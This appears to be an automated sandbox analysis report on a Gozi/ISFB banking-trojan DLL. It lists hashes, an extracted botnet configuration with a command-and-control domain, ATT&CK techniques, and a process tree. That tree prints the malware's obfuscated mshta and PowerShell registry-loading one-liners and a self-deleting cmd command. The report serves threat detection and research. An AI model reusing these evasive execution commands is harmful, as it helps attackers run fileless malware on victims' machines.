gozi | 28d9423364dd6a924b7fb770b4dbd13d0e7e0eb704c310d2b2bbd75073d8a103

Analysis

max time kernel
152s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
13-10-2023 14:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

modulo.dll
Size

206KB
MD5

72e2a5c797954e895a41be5b20f867b2
SHA1

419aacfb3ccea9b08277bcc9405054fa4238a597
SHA256

858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
SHA512

77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3
SSDEEP

6144:sMmIE7vr+qWNGzfXDanCU60rPP+vJsWKq12Jy:o/7DrQGzfXDeCU6cevKWXwy

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

fotexion.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

fotexion.com

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

35 4948 rundll32.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation mshta.exe

flow	pid	process
35	4948	rundll32.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4752 set thread context of 3136	4752	powershell.exe	Explorer.EXE
PID 3136 set thread context of 3716	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 set thread context of 4056	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 set thread context of 4856	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 set thread context of 1968	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 set thread context of 4868	3136	Explorer.EXE	cmd.exe
PID 3136 set thread context of 3332	3136	Explorer.EXE	cmd.exe
PID 4868 set thread context of 1528	4868	cmd.exe	PING.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1528 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

1528 PING.EXE

pid	process
1528	PING.EXE

pid	process
1528	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

rundll32.exepowershell.exeExplorer.EXE

pid	process
4948	rundll32.exe
4948	rundll32.exe
4752	powershell.exe
4752	powershell.exe
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE

Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

4752 powershell.exe
3136 Explorer.EXE
3136 Explorer.EXE
3136 Explorer.EXE
3136 Explorer.EXE
3136 Explorer.EXE
3136 Explorer.EXE
4868 cmd.exe

pid	process
4752	powershell.exe
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
4868	cmd.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

powershell.exeExplorer.EXERuntimeBroker.exe

description	pid	process
Token: SeDebugPrivilege	4752	powershell.exe
Token: SeShutdownPrivilege	3136	Explorer.EXE
Token: SeCreatePagefilePrivilege	3136	Explorer.EXE
Token: SeShutdownPrivilege	3136	Explorer.EXE
Token: SeCreatePagefilePrivilege	3136	Explorer.EXE
Token: SeShutdownPrivilege	3136	Explorer.EXE
Token: SeCreatePagefilePrivilege	3136	Explorer.EXE
Token: SeShutdownPrivilege	3136	Explorer.EXE
Token: SeCreatePagefilePrivilege	3136	Explorer.EXE
Token: SeShutdownPrivilege	3716	RuntimeBroker.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3136 Explorer.EXE
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3136 Explorer.EXE

pid	process
3136	Explorer.EXE

pid	process
3136	Explorer.EXE

Suspicious use of WriteProcessMemory 49 IoCs

Processes:

rundll32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 3460 wrote to memory of 4948	3460	rundll32.exe	rundll32.exe
PID 3460 wrote to memory of 4948	3460	rundll32.exe	rundll32.exe
PID 3460 wrote to memory of 4948	3460	rundll32.exe	rundll32.exe
PID 4456 wrote to memory of 4752	4456	mshta.exe	powershell.exe
PID 4456 wrote to memory of 4752	4456	mshta.exe	powershell.exe
PID 4752 wrote to memory of 3476	4752	powershell.exe	csc.exe
PID 4752 wrote to memory of 3476	4752	powershell.exe	csc.exe
PID 3476 wrote to memory of 3936	3476	csc.exe	cvtres.exe
PID 3476 wrote to memory of 3936	3476	csc.exe	cvtres.exe
PID 4752 wrote to memory of 3536	4752	powershell.exe	csc.exe
PID 4752 wrote to memory of 3536	4752	powershell.exe	csc.exe
PID 3536 wrote to memory of 2856	3536	csc.exe	cvtres.exe
PID 3536 wrote to memory of 2856	3536	csc.exe	cvtres.exe
PID 4752 wrote to memory of 3136	4752	powershell.exe	Explorer.EXE
PID 4752 wrote to memory of 3136	4752	powershell.exe	Explorer.EXE
PID 4752 wrote to memory of 3136	4752	powershell.exe	Explorer.EXE
PID 4752 wrote to memory of 3136	4752	powershell.exe	Explorer.EXE
PID 3136 wrote to memory of 3716	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 3716	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 3716	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 3716	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 4056	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 4056	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 4056	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 4056	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 4856	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 4856	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 4856	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 4856	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 1968	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 1968	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 1968	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 1968	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 4868	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 4868	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 4868	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 3332	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 3332	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 3332	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 3332	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 4868	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 4868	3136	Explorer.EXE	cmd.exe
PID 4868 wrote to memory of 1528	4868	cmd.exe	PING.EXE
PID 4868 wrote to memory of 1528	4868	cmd.exe	PING.EXE
PID 4868 wrote to memory of 1528	4868	cmd.exe	PING.EXE
PID 3136 wrote to memory of 3332	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 3332	3136	Explorer.EXE	cmd.exe
PID 4868 wrote to memory of 1528	4868	cmd.exe	PING.EXE
PID 4868 wrote to memory of 1528	4868	cmd.exe	PING.EXE

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3716

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\modulo.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:3460

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\modulo.dll,#1
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:4948

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4856

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4056

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3136

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>V5jv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(V5jv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9\\\ActiveStart'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name lqoqaormx -value gp; new-alias -name qancjqwv -value iex; qancjqwv ([System.Text.Encoding]::ASCII.GetString((lqoqaormx "HKCU:Software\AppDataLow\Software\Microsoft\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9").ClassFile))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4752

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\crhtbwuc\crhtbwuc.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3476

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC58D.tmp" "c:\Users\Admin\AppData\Local\Temp\crhtbwuc\CSCE3BA072C87714FE1ABB7E771F9992F2.TMP"
5⤵
PID:3936

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ilj5kmzj\ilj5kmzj.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3536

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC6E5.tmp" "c:\Users\Admin\AppData\Local\Temp\ilj5kmzj\CSC76820425C86F40CBB9FA1C682DCF63B9.TMP"
5⤵
PID:2856

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\modulo.dll"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4868

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1528

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:3332

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESC58D.tmp
Filesize
1KB

MD5
af392eeba5f4657ece5bb677b598bca1

SHA1
2e319c725e4fe4f2b6146d84776f1c665f447da5

SHA256
fb106cd644a7b376cd99cdbdaa71ae809021fd34e195ae6e8f69ed588519e0d4

SHA512
aa6673242876efa06142cd07a61588ca92acc2e12cf1bc8d9781d436a4dc54728ab3ba5ac1cb95966ab42adbada4ec2dfe0d78d44744db0a5ff762ee5a22731d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC6E5.tmp
Filesize
1KB

MD5
3331dd9da0ecc15b70e6e4adae412703

SHA1
06480755b992ff768df5adf2a53e8d4c13d35208

SHA256
ae4e57672ac5360690943ab0c31e0bd708099154e32c2b30f5a4b16a5093af3a

SHA512
cbe01143192995d828ec4c082a4602395d2dd705653ba9b641d4f84d9d6d9d4a462c5ace1447eeec4b4f3dda2a4dd6d8ac03444b49c45697208300f95deee0bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dooh52ov.sfa.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\crhtbwuc\crhtbwuc.dll
Filesize
3KB

MD5
54c2fbcb5100e0fcf5d886a5428f28d0

SHA1
fbfa31faf0079ea71fc4d86e4cbb99d382f0291e

SHA256
2927f19f893f448d97c268c45f083dfdf8705b620ade29ba33354db34621de02

SHA512
7c2cff467abc2ee67974a920f78534385700d0264cd4a300a33099ac99d12819c8c62580307f3c6fa2b715aea25b36745388fd12f3e11971e55b6508c681ab01

Download Submit
C:\Users\Admin\AppData\Local\Temp\ilj5kmzj\ilj5kmzj.dll
Filesize
3KB

MD5
210581b2a0798520a31fde10c44b950c

SHA1
6075932cc1e25ef4d32a0159fa44be96b01011ca

SHA256
81115fddba1d1fe2ce56567325e0c3f17c60b6b2498deb410e475a9ebee48d18

SHA512
cb7e8b3f19eeb1af856bcfede586dd6b0bf84734b06256185201180609171c05f3ee42642117faecaa0a27f843e64449e39183fc3ea9419da440ab331659776a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\crhtbwuc\CSCE3BA072C87714FE1ABB7E771F9992F2.TMP
Filesize
652B

MD5
a74ce3c01bd1c931a91d6ab7732fdc36

SHA1
7eb4a4b30911861b1a28fa43db67607ac6557d83

SHA256
63dff9d720af0d8ff3e68abc7a90b0d10b981619293ece6b3e36534b10d5f0f4

SHA512
b99a528c80e488e5936774688be29ffd49023503b6d532e9b8988e0c0bdb5218857e96d52403227bcbb672681e9d315360e708e1a246ac667862d9c455072104

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\crhtbwuc\crhtbwuc.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\crhtbwuc\crhtbwuc.cmdline
Filesize
369B

MD5
430271be29d4304fa2ba0292fc130617

SHA1
9bfc1b5760ce37f4a1bade964964439df2b4fa10

SHA256
5a084366bb115c3b1ef80a506deb7b15f9c9df4a6b7fce2597b4749a92b053e4

SHA512
f957e7c81d0386c19624933ebaff5b5e8683485fb5fca1e86a15ddfb69a4626a2a368596119f311c668cd39ae1606d7812e1cf00e589975bf52661cab86c923f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ilj5kmzj\CSC76820425C86F40CBB9FA1C682DCF63B9.TMP
Filesize
652B

MD5
492295b03103b1ad81d8eefef5c9d3c3

SHA1
491a37ad94119b577cb28960ba7c1b47c6e612c9

SHA256
0d33189f24852e234a9e79f02ddeb88f3c24a90b4cc41c9b43f8c46c48e0b286

SHA512
5105a027f2ee9ae2ba1717179a52dc5545d656cf29c578891e959348b640fd22b85faf794ab1c0cd3ce77d8179ca2e8e244eef3aff40c1636da3d4a39371aa5f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ilj5kmzj\ilj5kmzj.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ilj5kmzj\ilj5kmzj.cmdline
Filesize
369B

MD5
a5b390d21c632820ddc35d0ed7c8ebbb

SHA1
fd669571cc66e14c820edfc8692fa39a58b03302

SHA256
cb0e066a84b582a914075d6bad491c040f3150323977bfdc90247876da881c6f

SHA512
139f2016cb526e8fd517a85eec79fc8056daac35613b66a2359a95a906f3b6a16b7e007e03430363fb63f82047938bd098f4e5b40799fd95442a9abb3f884d8c

Download Submit
memory/1528-103-0x000001DAC3960000-0x000001DAC3A04000-memory.dmp

Filesize
656KB

Download
memory/1528-105-0x000001DAC37B0000-0x000001DAC37B1000-memory.dmp

Filesize
4KB

Download
memory/1528-113-0x000001DAC3960000-0x000001DAC3A04000-memory.dmp

Filesize
656KB

Download
memory/1968-89-0x0000016DF10F0000-0x0000016DF1194000-memory.dmp

Filesize
656KB

Download
memory/1968-88-0x0000016DF11A0000-0x0000016DF11A1000-memory.dmp

Filesize
4KB

Download
memory/1968-82-0x0000016DF10F0000-0x0000016DF1194000-memory.dmp

Filesize
656KB

Download
memory/3136-52-0x0000000000540000-0x0000000000541000-memory.dmp

Filesize
4KB

Download
memory/3136-98-0x0000000008310000-0x00000000083B4000-memory.dmp

Filesize
656KB

Download
memory/3136-51-0x0000000008310000-0x00000000083B4000-memory.dmp

Filesize
656KB

Download
memory/3332-108-0x0000000000E00000-0x0000000000E98000-memory.dmp

Filesize
608KB

Download
memory/3332-99-0x0000000000A70000-0x0000000000A71000-memory.dmp

Filesize
4KB

Download
memory/3332-97-0x0000000000E00000-0x0000000000E98000-memory.dmp

Filesize
608KB

Download
memory/3716-111-0x000001BFB2030000-0x000001BFB20D4000-memory.dmp

Filesize
656KB

Download
memory/3716-65-0x000001BFB2030000-0x000001BFB20D4000-memory.dmp

Filesize
656KB

Download
memory/3716-66-0x000001BFB20E0000-0x000001BFB20E1000-memory.dmp

Filesize
4KB

Download
memory/4056-71-0x000002A8055E0000-0x000002A805684000-memory.dmp

Filesize
656KB

Download
memory/4056-112-0x000002A8055E0000-0x000002A805684000-memory.dmp

Filesize
656KB

Download
memory/4056-72-0x000002A8055A0000-0x000002A8055A1000-memory.dmp

Filesize
4KB

Download
memory/4752-63-0x000002BBE9090000-0x000002BBE90CD000-memory.dmp

Filesize
244KB

Download
memory/4752-62-0x00007FFE410F0000-0x00007FFE41BB1000-memory.dmp

Filesize
10.8MB

Download
memory/4752-47-0x000002BBE8D70000-0x000002BBE8D78000-memory.dmp

Filesize
32KB

Download
memory/4752-18-0x000002BBE8D80000-0x000002BBE8D90000-memory.dmp

Filesize
64KB

Download
memory/4752-20-0x000002BBE8D80000-0x000002BBE8D90000-memory.dmp

Filesize
64KB

Download
memory/4752-17-0x00007FFE410F0000-0x00007FFE41BB1000-memory.dmp

Filesize
10.8MB

Download
memory/4752-49-0x000002BBE9090000-0x000002BBE90CD000-memory.dmp

Filesize
244KB

Download
memory/4752-7-0x000002BBE8880000-0x000002BBE88A2000-memory.dmp

Filesize
136KB

Download
memory/4752-33-0x000002BBE86E0000-0x000002BBE86E8000-memory.dmp

Filesize
32KB

Download
memory/4752-19-0x000002BBE8D80000-0x000002BBE8D90000-memory.dmp

Filesize
64KB

Download
memory/4856-87-0x0000028DE18D0000-0x0000028DE1974000-memory.dmp

Filesize
656KB

Download
memory/4856-86-0x0000028DE1170000-0x0000028DE1171000-memory.dmp

Filesize
4KB

Download
memory/4856-77-0x0000028DE18D0000-0x0000028DE1974000-memory.dmp

Filesize
656KB

Download
memory/4868-93-0x000002D497D90000-0x000002D497D91000-memory.dmp

Filesize
4KB

Download
memory/4868-92-0x000002D497CE0000-0x000002D497D84000-memory.dmp

Filesize
656KB

Download
memory/4868-114-0x000002D497CE0000-0x000002D497D84000-memory.dmp

Filesize
656KB

Download
memory/4948-0-0x0000000000FE0000-0x0000000001009000-memory.dmp

Filesize
164KB

Download
memory/4948-110-0x0000000000EB0000-0x0000000000EBE000-memory.dmp

Filesize
56KB

Download
memory/4948-2-0x0000000001070000-0x000000000107D000-memory.dmp

Filesize
52KB

Download
memory/4948-1-0x0000000000EB0000-0x0000000000EBE000-memory.dmp

Filesize
56KB

Download
memory/4948-5-0x0000000000EB0000-0x0000000000EBE000-memory.dmp

Filesize
56KB

Download